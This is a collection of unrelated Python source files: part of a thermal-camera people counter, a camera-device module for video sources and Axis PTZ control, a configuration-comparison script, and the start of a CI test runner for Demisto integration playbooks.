send_thread = threading.Thread(
target=send_lora, args=(LORA_SEND_INTERVAL,))
send_thread.start()
print('sensor started!')
while(screencap):
start = time.time()
# read the pixels
pixels = []
for row in sensor.pixels:
pixels = pixels + row
payload['a'] = 0
payload['o'] = 0
payload['c'] = ct.get_count()
mode_result = stats.mode([round(p) for p in pixels])
mode_list.append(int(mode_result[0]))
# instead of taking the ambient temperature over one frame of data, take it over a set amount of time
MAX_TEMP = float(np.mean(mode_list)) + AMBIENT_OFFSET
pixels = [map_value(p, mode_result[0] + 1, MAX_TEMP, 0,
COLOR_DEPTH - 1) for p in pixels]
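# Worked example of the rolling ambient logic above (illustrative numbers): if the
# mode of recent frames averages 22 degrees and AMBIENT_OFFSET is 6, MAX_TEMP becomes
# 28.0; a pixel reading of 25 with COLOR_DEPTH=1024 then maps to
# map_value(25, 23, 28.0, 0, 1023) ~= 409, i.e. roughly 40% up the color ramp.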
# perform interpolation
bicubic = griddata(points, pixels, (grid_x, grid_y), method='cubic')
# draw everything
for ix, row in enumerate(bicubic):
for jx, pixel in enumerate(row):
try:
pygame.draw.rect(lcd, colors[constrain(int(pixel), 0, COLOR_DEPTH - 1)],
(displayPixelHeight * ix, displayPixelWidth * jx, displayPixelHeight, displayPixelWidth))
except:
print("Caught drawing error")
surface = pygame.display.get_surface()
myfont = pygame.font.SysFont("comicsansms", 25)
img = pygame.surfarray.array3d(surface)
img = np.swapaxes(img, 0, 1)
# Read image
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
img = cv2.bitwise_not(img)
# Detect blobs.
keypoints = detector.detect(img)
img_with_keypoints = cv2.drawKeypoints(img, keypoints, np.array(
[]), (0, 0, 255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)
# draw a horizontal line in the center of the frame -- once an
# object crosses this line we will determine whether they were
# moving 'up' or 'down'
pygame.draw.line(lcd, (255, 255, 255),
(0, height // 2), (width, height // 2), 2)
pygame.display.update()
for i in range(0, len(keypoints)):
x = keypoints[i].pt[0]
y = keypoints[i].pt[1]
# print circle around blobs
pygame.draw.circle(lcd, (200, 0, 0), (int(
x), int(y)), round(keypoints[i].size), 2)
# update our centroid tracker using the detected centroids
objects = ct.update(keypoints)
# loop over the tracked objects
for (objectID, centroid) in objects.items():
# check to see if a trackable object exists for the current
# object ID
to = trackableObjects.get(objectID, None)
# if there is no existing trackable object, create one
if to is None:
to = TrackableObject(objectID, centroid)
# otherwise, there is a trackable object so we can utilize it
# to determine direction
else:
# the difference between the y-coordinate of the *current*
# centroid and the mean of *previous* centroids will tell
# us in which direction the object is moving (negative for
# 'up' and positive for 'down')
y = [c[1] for c in to.centroids]
direction = centroid[1] - np.mean(y)
to.centroids.append(centroid)
# check to see if the object has been counted or not
if not to.counted:
# if the direction is negative (indicating the object
# is moving up) AND the centroid is above the center
# line, count the object
# the historical centroid must be present in the lower half of the screen
if direction < 0 and centroid[1] < height // 2 and count_within_range(y, height//2, height) > 0:
total_up += 1
to.counted = True
# if the direction is positive (indicating the object
# is moving down) AND the centroid is below the
# center line, count the object
# the historical centroid must be present in the upper half of the screen
elif direction > 0 and centroid[1] > height // 2 and count_within_range(y, 0, height//2) > 0:
total_down += 1
to.counted = True
# store the trackable object in our dictionary
trackableObjects[objectID] = to
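# Worked example of the direction check above (illustrative numbers, height=240):
# if an object's previous centroids had y values [200, 190] and the current centroid
# is at y=110, then direction = 110 - mean([200, 190]) = -85 (< 0), the centroid is
# above the center line (110 < 120), and count_within_range([200, 190], 120, 240) == 2 > 0,
# so the object is counted as moving 'up'.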
# update counter in top left
textsurface1 = myfont.render(
"IN: "+str(total_up), False, (255, 255, 255))
textsurface2 = myfont.render(
'OUT: '+str(total_down), False, (255, 255, 255))
lcd.blit(textsurface1, (0, 0))
lcd.blit(textsurface2, (0, 25))
total_up_old = total_up
total_down_old = total_down
pygame.display.update()
for event in pygame.event.get():
if event.type == pygame.KEYDOWN:
print('terminating...')
screencap = False
break
# for running the save on for a certain amount of time
# if time.time() - start_time >= 10:
# print('terminating...')
# screencap = False
# empty mode_list every AMBIENT_TIME *10 seconds to get current ambient temperature
if len(mode_list) > AMBIENT_TIME:
mode_list = []
time.sleep(max(1./25 - (time.time() - start), 0))
# Release everything if job is finished
cv2.destroyAllWindows()
if __name__ == "__main__":
main()
|
video.py
|
import os
import re
import threading
import time
from io import BytesIO, StringIO
import numpy
import redis
import requests
from PIL import Image
from zope.interface import implementer
from mxdc import Signal, Device
from mxdc import conf
from mxdc.utils.log import get_module_logger
from .interfaces import ICamera, IZoomableCamera, IPTZCameraController
# setup module logger with a default do-nothing handler
logger = get_module_logger(__name__)
session = requests.Session()
@implementer(ICamera)
class VideoSrc(Device):
"""
Base class for all Video Sources. Maintains a list of listeners (sinks)
and updates each one when the video frame changes.
:param name: Camera Name (str)
:param maxfps: Max frames per second (float)
"""
class Signals:
resized = Signal("resized", arg_types=(int,int))
def __init__(self, name="Basic Camera", maxfps=5.0):
super().__init__()
self.frame = None
self.name = name
self.size = (768, 576)
self.maxfps = max(1.0, maxfps)
self.resolution = 1.0e-3
self.gain_factor = 1.0
self.gain_value = 1.0
self.zoom_save = False
self.sinks = []
self._stopped = True
self.set_state(active=True)
def configure(self, **kwargs):
"""
Configure the camera. Keyword arguments are device dependent.
"""
pass
def add_sink(self, sink):
"""
Add a sink to the Camera
:param sink: :class:`mxdc.interface.IVideoSink` provider
"""
self.sinks.append(sink)
sink.set_src(self)
def del_sink(self, sink):
"""
Remove a video sink.
:param sink: :class:`mxdc.interface.IVideoSink` provider
"""
if sink in self.sinks:
self.sinks.remove(sink)
def start(self):
"""
Start producing video frames.
"""
if self._stopped:
self._stopped = False
worker = threading.Thread(target=self.streamer)
worker.name = 'Video Thread: %s' % self.name
worker.daemon = True
worker.start()
def stop(self):
"""
Stop producing video frames.
"""
self._stopped = True
def streamer(self):
dur = 1.0 / self.maxfps
while not self._stopped:
t = time.time()
if self.is_active() and any(not (sink.stopped) for sink in self.sinks):
try:
img = self.get_frame()
if img and img.size != self.size:
self.size = img.size
self.set_state(resized=self.size)
if not img:
continue
for sink in self.sinks:
sink.display(img)
except Exception as e:
logger.warning('(%s) Error fetching frame:\n %s' % (self.name, e))
raise
time.sleep(max(0, dur - (time.time() - t)))
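# Frame-pacing sketch (illustrative): with maxfps=5.0 the loop budget is dur = 0.2 s
# per frame; if fetching and displaying a frame took 0.05 s, the thread sleeps
# max(0, 0.2 - 0.05) = 0.15 s, so sinks are never updated faster than maxfps while
# slow frames are not delayed any further.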
def get_frame(self):
"""
Obtain the most recent video frame.
:return: A PIL Image object.
"""
pass
def cleanup(self):
self.stop()
class SimCamera(VideoSrc):
"""
Simulated Camera
"""
def __init__(self, name="Camera Simulator", size=(1280, 960)):
super().__init__(name=name)
self.size = size
self.resolution = 5.34e-3 * numpy.exp(-0.18)
self._packet_size = self.size[0] * self.size[1]*3
self._fsource = open('/dev/urandom', 'rb')
self.set_state(active=True, health=(0, '', ''))
def get_frame(self):
data = self._fsource.read(self._packet_size)
self.frame = Image.frombytes('RGB', self.size, data)
return self.frame
class SimGIFCamera(VideoSrc):
"""
Simulated Camera
"""
def __init__(self, name="GIF Camera Simulator"):
super().__init__(name=name)
self.src = Image.open(os.path.join(conf.APP_DIR, 'share/data/simulated/crystal.gif'))
self.index = 0
self.size = (1280, 960)
self.resolution = 5.34e-3 * numpy.exp(-0.18)
self.set_state(active=True, health=(0, '', ''))
def get_frame(self):
try:
self.src.seek(self.index)
self.index += 1
self.frame = self.src.resize(self.size, Image.NEAREST).convert('RGB')
except EOFError:
self.index = 0
return self.frame
@implementer(IPTZCameraController)
class SimPTZCamera(SimCamera):
"""
Simulated PTZ Camera
"""
def __init__(self):
super().__init__(name='Sim PTZ Camera', size=(1920, 1080))
def zoom(self, value):
pass
def center(self, x, y):
pass
def goto(self, position):
pass
def get_presets(self):
presets = ["Hutch", "Detector", "Robot", "Goniometer", "Sample", "Panel"]
return presets
class MJPGCamera(VideoSrc):
"""
MJPG Camera
"""
def __init__(self, url, size=(768, 576), name='MJPG Camera'):
VideoSrc.__init__(self, name, maxfps=10.0)
self.size = size
self._read_size = 1024
self.url = url
self._last_frame = time.time()
self.stream = None
self.data = b''
self.set_state(active=True)
self.lock = threading.Lock()
def get_frame(self):
return self.get_frame_raw()
def get_frame_raw(self):
if not self.stream:
self.stream = requests.get(self.url, stream=True).raw
try:
with self.lock:
both_found = False
while not both_found:
self.data += self.stream.read(self._read_size)
b = self.data.rfind(b'\xff\xd9')
a = self.data[:b].rfind(b'\xff\xd8')
if a != -1 and b != -1:
jpg = self.data[a:b + 2]
self.data = self.data[b + 2:]
self.frame = Image.open(BytesIO(jpg))
both_found = True
time.sleep(0)
except Exception as e:
logger.error(e)
self.stream = requests.get(self.url, stream=True).raw
return self.frame
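# Illustrative sketch of the MJPEG framing above (hypothetical buffer contents): given
#   self.data = b'...\xff\xd8<jpeg payload>\xff\xd9<start of next frame>'
# rfind(b'\xff\xd9') locates the last end-of-image (EOI) marker, rfind(b'\xff\xd8')
# on the slice before it locates the matching start-of-image (SOI) marker, and
# self.data[a:b + 2] is one complete JPEG that PIL can decode from a BytesIO.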
class JPGCamera(VideoSrc):
"""
JPG Camera
"""
def __init__(self, url, size=(768, 576), name='JPG Camera'):
VideoSrc.__init__(self, name, maxfps=10.0)
self.size = size
self.url = url
self.session = requests.Session()
self.set_state(active=True)
def get_frame(self):
return self.get_frame_raw()
def get_frame_raw(self):
r = self.session.get(self.url)
if r.status_code == 200:
self.frame = Image.open(BytesIO(r.content))
return self.frame
class REDISCamera(VideoSrc):
"""
REDIS Camera
"""
ATTRS = {
'gain': 'GainRaw',
'exposure': 'ExposureTimeAbs'
}
def __init__(self, server, mac,size=(1280,1024), name='REDIS Camera'):
VideoSrc.__init__(self, name, maxfps=15.0)
self.store = redis.Redis(host=server, port=6379, db=0)
self.key = mac
self.server = server
self.size = size
self.set_state(active=True)
self.lock = threading.Lock()
def configure(self, **kwargs):
if 'gain_factor' in kwargs:
self.gain_factor = kwargs.pop('gain_factor')
kwargs['gain'] = self.gain_value
for k, v in list(kwargs.items()):
attr = self.ATTRS.get(k)
if not attr: continue
if k == 'gain':
if int(v) == self.gain_value: continue
self.gain_value = int(v)
value = max(1, min(22, self.gain_factor * self.gain_value))
else:
value = v
self.store.publish('{}:CFG:{}'.format(self.key, attr), value)
def get_frame(self):
return self.get_frame_jpg()
def get_frame_raw(self):
with self.lock:
data = self.store.get('{}:RAW'.format(self.key))
while len(data) < self.size[0] * self.size[1] * 3:
data = self.store.get('{}:RAW'.format(self.key))
time.sleep(0.002)
img = Image.frombytes('RGB', self.size, data, 'raw')
self.frame = img.transpose(Image.FLIP_LEFT_RIGHT)
return self.frame
def get_frame_jpg(self):
with self.lock:
data = self.store.get('{}:JPG'.format(self.key))
self.frame = Image.open(BytesIO(data))
return self.frame
class AxisCamera(JPGCamera):
"""
Axis JPG Camera
"""
def __init__(self, hostname, idx=None, name='Axis Camera'):
if idx is None:
url = 'http://%s/jpg/image.jpg' % hostname
else:
url = 'http://%s/jpg/%s/image.jpg' % (hostname, idx)
super(AxisCamera, self).__init__(url, name=name)
@implementer(IZoomableCamera)
class ZoomableCamera(object):
def __init__(self, camera, zoom_motor):
self.camera = camera
self._zoom = zoom_motor
def zoom(self, value, wait=False):
"""
Zoom to the given value.
:param value: zoom value
:param wait: (boolean) default False, whether to wait until camera has zoomed in.
"""
self._zoom.move_to(value, wait=wait)
def __getattr__(self, key):
try:
return getattr(self.camera, key)
except AttributeError:
raise
@implementer(IPTZCameraController)
class AxisPTZCamera(AxisCamera):
"""
Axis PTZ Camera
"""
def __init__(self, hostname, idx=None, name='Axis PTZ Camera'):
AxisCamera.__init__(self, hostname, idx, name)
self.url_root = 'http://{}/axis-cgi/com/ptz.cgi'.format(hostname)
self._rzoom = 0
self.presets = []
try:
self.fetch_presets()
except requests.ConnectionError:
logger.error('Failed to establish connection')
def zoom(self, value, wait=False):
requests.get(self.url_root, params={'rzoom': value})
self._rzoom -= value
def center(self, x, y):
"""
Center the Pan-Tilt-Zoom Camera at the given point.
:param x: (int), x point
:param y: (int), y point
"""
requests.get(self.url_root, params={'center': '{},{}'.format(x, y)})
def goto(self, position):
"""
Go to the given named position
:param position: named position
"""
requests.get(self.url_root, params={'gotoserverpresetname': position})
self._rzoom = 0
def get_presets(self):
return self.presets
def fetch_presets(self):
"""
Obtain a list of named positions from the PTZ Camera
:return: list of strings
"""
presets = []
r = requests.get(self.url_root, params={'query': 'presetposall'})
if r.status_code == requests.codes.ok:
pospatt = re.compile(r'presetposno.+=(?P<name>[\w ]+)')
for line in r.text.split('\n'):
m = pospatt.match(line)
if m:
presets.append(m.group('name'))
self.presets = presets
|
cfg_compare.py
|
#!/usr/bin/env python
import os, sys, subprocess
import argparse
import threading
import timeit
from configobj import ConfigObj
from cvguipy import cvconfig
if __name__ == '__main__':
parser = argparse.ArgumentParser(description="compare two configuration files")
parser.add_argument('config1', help= "configuration file name")
parser.add_argument('config2', help= "configuration file name")
args = parser.parse_args()
# inputVideo check
if not os.path.exists(args.config1):
print("{} does not exist! Exiting...".format(args.config1))
sys.exit(1)
if not os.path.exists(args.config2):
print("{} does not exist! Exiting...".format(args.config2))
sys.exit(1)
config1 = ConfigObj(args.config1)
config2 = ConfigObj(args.config2)
threads = []
# get configuration and put them to a List
cfg_list1 = cvconfig.CVConfigList()
threads.append(threading.Thread(target = cvconfig.config_to_list, args = (cfg_list1, config1)))
cfg_list2 = cvconfig.CVConfigList()
threads.append(threading.Thread(target = cvconfig.config_to_list, args = (cfg_list2, config2)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
while cfg_list1.name is not None and cfg_list2.name is not None:
if cfg_list1.name != cfg_list2.name:
print("Not Cosistent Configuration...Exiting...")
sys.exit(1)
if cfg_list1.range[0] != cfg_list2.range[0]:
print("{}: {} | {}".format(cfg_list1.name, cfg_list1.range, cfg_list2.range))
cfg_list1 = cfg_list1.next
cfg_list2 = cfg_list2.next
|
test_content.py
|
from __future__ import print_function
import os
import re
import sys
import json
import time
import argparse
import threading
import subprocess
import traceback
from time import sleep
import datetime
from distutils.version import LooseVersion
import pytz
from google.cloud import storage
from google.api_core.exceptions import PreconditionFailed
from queue import Queue
from contextlib import contextmanager
import urllib3
import requests
import demisto_client.demisto_api
from slackclient import SlackClient
from Tests.mock_server import MITMProxy, AMIConnection
from Tests.test_integration import Docker, test_integration, disable_all_integrations
from Tests.test_dependencies import get_used_integrations, get_tests_allocation_for_threads
from demisto_sdk.commands.common.constants import RUN_ALL_TESTS_FORMAT, FILTER_CONF, PB_Status
from demisto_sdk.commands.common.tools import print_color, print_error, print_warning, \
LOG_COLORS, str2bool
# Disable insecure warnings
urllib3.disable_warnings()
SERVER_URL = "https://{}"
INTEGRATIONS_CONF = "./Tests/integrations_file.txt"
FAILED_MATCH_INSTANCE_MSG = "{} Failed to run.\n There are {} instances of {}, please select one of them by using " \
"the instance_name argument in conf.json. The options are:\n{}"
SERVICE_RESTART_TIMEOUT = 300
SERVICE_RESTART_POLLING_INTERVAL = 5
LOCKS_PATH = 'content-locks'
BUCKET_NAME = os.environ.get('GCS_ARTIFACTS_BUCKET')
CIRCLE_BUILD_NUM = os.environ.get('CIRCLE_BUILD_NUM')
WORKFLOW_ID = os.environ.get('CIRCLE_WORKFLOW_ID')
CIRCLE_STATUS_TOKEN = os.environ.get('CIRCLECI_STATUS_TOKEN')
SLACK_MEM_CHANNEL_ID = 'CM55V7J8K'
def options_handler():
parser = argparse.ArgumentParser(description='Utility for batch action on incidents')
parser.add_argument('-k', '--apiKey', help='The Demisto API key for the server', required=True)
parser.add_argument('-s', '--server', help='The server URL to connect to')
parser.add_argument('-c', '--conf', help='Path to conf file', required=True)
parser.add_argument('-e', '--secret', help='Path to secret conf file')
parser.add_argument('-n', '--nightly', type=str2bool, help='Run nightly tests')
parser.add_argument('-t', '--slack', help='The token for slack', required=True)
parser.add_argument('-a', '--circleci', help='The token for circleci', required=True)
parser.add_argument('-b', '--buildNumber', help='The build number', required=True)
parser.add_argument('-g', '--buildName', help='The build name', required=True)
parser.add_argument('-i', '--isAMI', type=str2bool, help='is AMI build or not', default=False)
parser.add_argument('-m', '--memCheck', type=str2bool,
help='Should trigger memory checks or not. The slack channel to check the data is: '
'dmst_content_nightly_memory_data', default=False)
parser.add_argument('-d', '--serverVersion', help='Which server version to run the '
'tests on (valid only when using AMI)', default="NonAMI")
parser.add_argument('-l', '--testsList', help='List of specific, comma-separated '
'tests to run')
options = parser.parse_args()
tests_settings = TestsSettings(options)
return tests_settings
class TestsSettings:
def __init__(self, options):
self.api_key = options.apiKey
self.server = options.server
self.conf_path = options.conf
self.secret_conf_path = options.secret
self.nightly = options.nightly
self.slack = options.slack
self.circleci = options.circleci
self.buildNumber = options.buildNumber
self.buildName = options.buildName
self.isAMI = options.isAMI
self.memCheck = options.memCheck
self.serverVersion = options.serverVersion
self.serverNumericVersion = None
self.specific_tests_to_run = self.parse_tests_list_arg(options.testsList)
self.is_local_run = (self.server is not None)
@staticmethod
def parse_tests_list_arg(tests_list):
tests_to_run = tests_list.split(",") if tests_list else []
return tests_to_run
class PrintJob:
def __init__(self, message_to_print, print_function_to_execute, message_color=None):
self.print_function_to_execute = print_function_to_execute
self.message_to_print = message_to_print
self.message_color = message_color
def execute_print(self):
if self.message_color:
self.print_function_to_execute(self.message_to_print, self.message_color)
else:
self.print_function_to_execute(self.message_to_print)
class ParallelPrintsManager:
def __init__(self, number_of_threads):
self.threads_print_jobs = [[] for i in range(number_of_threads)]
self.print_lock = threading.Lock()
self.threads_last_update_times = [time.time() for i in range(number_of_threads)]
def should_update_thread_status(self, thread_index):
current_time = time.time()
thread_last_update = self.threads_last_update_times[thread_index]
return current_time - thread_last_update > 300
def add_print_job(self, message_to_print, print_function_to_execute, thread_index, message_color=None,
include_timestamp=False):
if include_timestamp:
message_to_print = f'[{datetime.datetime.now()}] {message_to_print}'
print_job = PrintJob(message_to_print, print_function_to_execute, message_color=message_color)
self.threads_print_jobs[thread_index].append(print_job)
if self.should_update_thread_status(thread_index):
print("Thread {} is still running.".format(thread_index))
self.threads_last_update_times[thread_index] = time.time()
def execute_thread_prints(self, thread_index):
self.print_lock.acquire()
prints_to_execute = self.threads_print_jobs[thread_index]
for print_job in prints_to_execute:
print_job.execute_print()
self.print_lock.release()
self.threads_print_jobs[thread_index] = []
class TestsDataKeeper:
def __init__(self):
self.succeeded_playbooks = []
self.failed_playbooks = []
self.skipped_tests = []
self.skipped_integrations = []
self.rerecorded_tests = []
self.empty_files = []
self.unmockable_integrations = {}
def add_tests_data(self, succeed_playbooks, failed_playbooks, skipped_tests, skipped_integration,
unmockable_integrations):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook in succeed_playbooks:
self.succeeded_playbooks.append(playbook)
for playbook in failed_playbooks:
self.failed_playbooks.append(playbook)
for playbook in skipped_tests:
self.skipped_tests.append(playbook)
for playbook in skipped_integration:
self.skipped_integrations.append(playbook)
for playbook_id, reason in unmockable_integrations.items():
self.unmockable_integrations[playbook_id] = reason
def add_proxy_related_test_data(self, proxy):
# Using multiple appends and not extend since append is guaranteed to be thread safe
for playbook_id in proxy.rerecorded_tests:
self.rerecorded_tests.append(playbook_id)
for playbook_id in proxy.empty_files:
self.empty_files.append(playbook_id)
def print_test_summary(tests_data_keeper, is_ami=True):
succeed_playbooks = tests_data_keeper.succeeded_playbooks
failed_playbooks = tests_data_keeper.failed_playbooks
skipped_tests = tests_data_keeper.skipped_tests
unmocklable_integrations = tests_data_keeper.unmockable_integrations
skipped_integration = tests_data_keeper.skipped_integrations
rerecorded_tests = tests_data_keeper.rerecorded_tests
empty_files = tests_data_keeper.empty_files
succeed_count = len(succeed_playbooks)
failed_count = len(failed_playbooks)
skipped_count = len(skipped_tests)
rerecorded_count = len(rerecorded_tests) if is_ami else 0
empty_mocks_count = len(empty_files) if is_ami else 0
unmocklable_integrations_count = len(unmocklable_integrations)
print('\nTEST RESULTS:')
tested_playbooks_message = '\t Number of playbooks tested - ' + str(succeed_count + failed_count)
print(tested_playbooks_message)
succeeded_playbooks_message = '\t Number of succeeded tests - ' + str(succeed_count)
print_color(succeeded_playbooks_message, LOG_COLORS.GREEN)
if failed_count > 0:
failed_tests_message = '\t Number of failed tests - ' + str(failed_count) + ':'
print_error(failed_tests_message)
for playbook_id in failed_playbooks:
print_error('\t - ' + playbook_id)
if rerecorded_count > 0:
recording_warning = '\t Tests with failed playback and successful re-recording - ' + str(rerecorded_count) + ':'
print_warning(recording_warning)
for playbook_id in rerecorded_tests:
print_warning('\t - ' + playbook_id)
if empty_mocks_count > 0:
empty_mock_successes_msg = '\t Successful tests with empty mock files - ' + str(empty_mocks_count) + ':'
print(empty_mock_successes_msg)
proxy_explanation = '\t (either there were no http requests or no traffic is passed through the proxy.\n' \
'\t Investigate the playbook and the integrations.\n' \
'\t If the integration has no http traffic, add to unmockable_integrations in conf.json)'
print(proxy_explanation)
for playbook_id in empty_files:
print('\t - ' + playbook_id)
if len(skipped_integration) > 0:
skipped_integrations_warning = '\t Number of skipped integration - ' + str(len(skipped_integration)) + ':'
print_warning(skipped_integrations_warning)
for playbook_id in skipped_integration:
print_warning('\t - ' + playbook_id)
if skipped_count > 0:
skipped_tests_warning = '\t Number of skipped tests - ' + str(skipped_count) + ':'
print_warning(skipped_tests_warning)
for playbook_id in skipped_tests:
print_warning('\t - ' + playbook_id)
if unmocklable_integrations_count > 0:
unmockable_warning = '\t Number of unmockable integrations - ' + str(unmocklable_integrations_count) + ':'
print_warning(unmockable_warning)
for playbook_id, reason in unmocklable_integrations.items():
print_warning('\t - ' + playbook_id + ' - ' + reason)
def update_test_msg(integrations, test_message):
if integrations:
integrations_names = [integration['name'] for integration in
integrations]
test_message = test_message + ' with integration(s): ' + ','.join(
integrations_names)
return test_message
def turn_off_telemetry(server, demisto_api_key):
"""
Turn off telemetry on the AMI instance
:param server: demisto server to connect to
:param demisto_api_key: api key to use for connection
:return: None
"""
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/telemetry?status=notelemetry')
if status_code != 200:
print_error('Request to turn off telemetry failed with status code "{}"\n{}'.format(status_code, body))
sys.exit(1)
def reset_containers(server, demisto_api_key, prints_manager, thread_index):
prints_manager.add_print_job('Resetting containers', print, thread_index)
client = demisto_client.configure(base_url=server, api_key=demisto_api_key, verify_ssl=False)
body, status_code, _ = demisto_client.generic_request_func(self=client, method='POST',
path='/containers/reset')
if status_code != 200:
error_msg = 'Request to reset containers failed with status code "{}"\n{}'.format(status_code, body)
prints_manager.add_print_job(error_msg, print_error, thread_index)
prints_manager.execute_thread_prints(thread_index)
sys.exit(1)
sleep(10)
def has_unmockable_integration(integrations, unmockable_integrations):
return list(set(x['name'] for x in integrations).intersection(unmockable_integrations.keys()))
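# Illustrative example (not in the original source):
#   has_unmockable_integration([{'name': 'A'}, {'name': 'B'}], {'B': 'uses websockets'})
#   -> ['B']   (any overlap means the test must run against the real service)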
def get_docker_limit():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.limit_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_processes_data():
process = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def get_docker_memory_data():
process = subprocess.Popen(['cat', '/sys/fs/cgroup/memory/memory.usage_in_bytes'], stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
stdout, stderr = process.communicate()
return stdout, stderr
def send_slack_message(slack, channel, text, user_name, as_user):
sc = SlackClient(slack)
sc.api_call(
"chat.postMessage",
channel=channel,
username=user_name,
as_user=as_user,
text=text,
mrkdwn='true'
)
def run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations, playbook_id,
succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, prints_manager, thread_index=0, is_mock_run=False):
with acquire_test_lock(integrations,
test_options.get('timeout'),
prints_manager,
thread_index,
tests_settings.conf_path) as lock:
if lock:
status, inc_id = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run, thread_index=thread_index)
# c.api_client.pool.close()
if status == PB_Status.COMPLETED:
prints_manager.add_print_job('PASS: {} succeed'.format(test_message), print_color, thread_index,
message_color=LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
elif status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
else:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
playbook_id_with_mock = playbook_id
if not is_mock_run:
playbook_id_with_mock += " (Mock Disabled)"
failed_playbooks.append(playbook_id_with_mock)
if not tests_settings.is_local_run:
notify_failed_test(slack, circle_ci, playbook_id, build_number, inc_id, server_url, build_name)
succeed = status in (PB_Status.COMPLETED, PB_Status.NOT_SUPPORTED_VERSION)
else:
tests_queue.put(conf_json_test_details)
succeed = False
return succeed
# run the test using a real instance, record traffic.
def run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=0):
proxy.set_tmp_folder()
proxy.start(playbook_id, record=True, thread_index=thread_index, prints_manager=prints_manager)
succeed = run_test_logic(conf_json_test_details, tests_queue, tests_settings, c, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index, is_mock_run=True)
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
proxy.clean_mock_file(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
if succeed:
proxy.move_mock_file_to_repo(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
proxy.set_repo_folder()
return succeed
def mock_run(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number, server_url,
build_name, start_message, prints_manager, thread_index=0):
rerecord = False
if proxy.has_mock_file(playbook_id):
start_mock_message = '{} (Mock: Playback)'.format(start_message)
prints_manager.add_print_job(start_mock_message, print, thread_index, include_timestamp=True)
proxy.start(playbook_id, thread_index=thread_index, prints_manager=prints_manager)
# run test
status, _ = test_integration(c, server_url, integrations, playbook_id, prints_manager, test_options,
is_mock_run=True, thread_index=thread_index)
# use results
proxy.stop(thread_index=thread_index, prints_manager=prints_manager)
if status == PB_Status.COMPLETED:
succeed_message = 'PASS: {} succeed'.format(test_message)
prints_manager.add_print_job(succeed_message, print_color, thread_index, LOG_COLORS.GREEN)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.NOT_SUPPORTED_VERSION:
not_supported_version_message = 'PASS: {} skipped - not supported version'.format(test_message)
prints_manager.add_print_job(not_supported_version_message, print, thread_index)
succeed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
if status == PB_Status.FAILED_DOCKER_TEST:
error_message = 'Failed: {} failed'.format(test_message)
prints_manager.add_print_job(error_message, print_error, thread_index)
failed_playbooks.append(playbook_id)
end_mock_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(end_mock_message, print, thread_index, include_timestamp=True)
return
mock_failed_message = "Test failed with mock, recording new mock file. (Mock: Recording)"
prints_manager.add_print_job(mock_failed_message, print, thread_index)
rerecord = True
else:
mock_recording_message = start_message + ' (Mock: Recording)'
prints_manager.add_print_job(mock_recording_message, print, thread_index, include_timestamp=True)
# Mock recording - no mock file or playback failure.
c = demisto_client.configure(base_url=c.api_client.configuration.host,
api_key=c.api_client.configuration.api_key, verify_ssl=False)
succeed = run_and_record(conf_json_test_details, tests_queue, tests_settings, c, proxy, failed_playbooks,
integrations, playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci,
build_number, server_url, build_name, prints_manager, thread_index=thread_index)
if rerecord and succeed:
proxy.rerecorded_tests.append(playbook_id)
test_end_message = f'------ Test {test_message} end ------\n'
prints_manager.add_print_job(test_end_message, print, thread_index, include_timestamp=True)
def run_test(conf_json_test_details, tests_queue, tests_settings, demisto_api_key, proxy, failed_playbooks,
integrations, unmockable_integrations, playbook_id, succeed_playbooks, test_message, test_options,
slack, circle_ci, build_number, server_url, build_name, prints_manager, is_ami=True, thread_index=0):
start_message = f'------ Test {test_message} start ------'
client = demisto_client.configure(base_url=server_url, api_key=demisto_api_key, verify_ssl=False)
if not is_ami or (not integrations or has_unmockable_integration(integrations, unmockable_integrations)):
prints_manager.add_print_job(start_message + ' (Mock: Disabled)', print, thread_index, include_timestamp=True)
run_test_logic(conf_json_test_details, tests_queue, tests_settings, client, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, prints_manager, thread_index=thread_index)
prints_manager.add_print_job('------ Test %s end ------\n' % (test_message,), print, thread_index,
include_timestamp=True)
return
mock_run(conf_json_test_details, tests_queue, tests_settings, client, proxy, failed_playbooks, integrations,
playbook_id, succeed_playbooks, test_message, test_options, slack, circle_ci, build_number,
server_url, build_name, start_message, prints_manager, thread_index=thread_index)
def http_request(url, params_dict=None):
try:
